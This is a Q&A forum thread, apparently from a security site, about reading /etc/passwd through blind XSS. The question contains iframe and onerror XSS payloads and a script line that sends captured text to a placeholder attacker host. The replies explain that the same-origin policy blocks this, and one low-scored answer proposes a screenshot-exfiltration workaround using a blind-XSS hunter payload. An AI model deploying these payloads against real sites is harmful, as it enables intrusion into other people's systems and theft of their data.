# How can I read local files from blind XSS?

Tags: xss, javascript, lfi, local-file-inclusion

When I do one of these payloads, I can see `/etc/passwd`:

```
<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
```

However this I got blind XSS, so I need to send the iframe text back to me, so I need to grub the iframe text and do something like `<script>document.location.href = 'http://my_ip/' + iframe_text`

How can I get the iframe text?

Comment: You cant read local files via blind xss

Comment: i did i read localfiles with blind xss...
see this code `<iframe src=file:///etc/passwd></iframe>`

Comment: We need more context. Where (to what system) are you injecting this, and who loads/displays the html in their browser?

Comment: @eyal That didn't read the file. It loaded the file into an iframe, which is in a different security origin to the rest of the page. The browser's same origin policy (SOP) prevents scripts on the page from reading the iframe contents.

Answer (score 15):

> ```
> <iframe src=file:///etc/passwd></iframe>
> ```

This displays a local file in the browser inside a separate iframe. This iframe has a different origin than the main frame. Due to same origin policy it is not possible to read the iframe content from the main frame, no matter if XSS or not.

Answer (score -1):

If you are sure about the Blind XSS, you have no way to retrieve the content of `/etc/passwd` to your server, but you do have trice to see the result.

You just need to inject a Blind XSS payload from your XSS hunter after injecting:

```
'<iframe src=file:///etc/passwd></iframe><YOUR BXSS PAYLOAD HERE>'
```

This will cause to execute the payload after the iframe injection and then you will be able to see the iframe content at the XSS hunter. Screenshot that you'll get back in your account.

Comment: what is "trice"?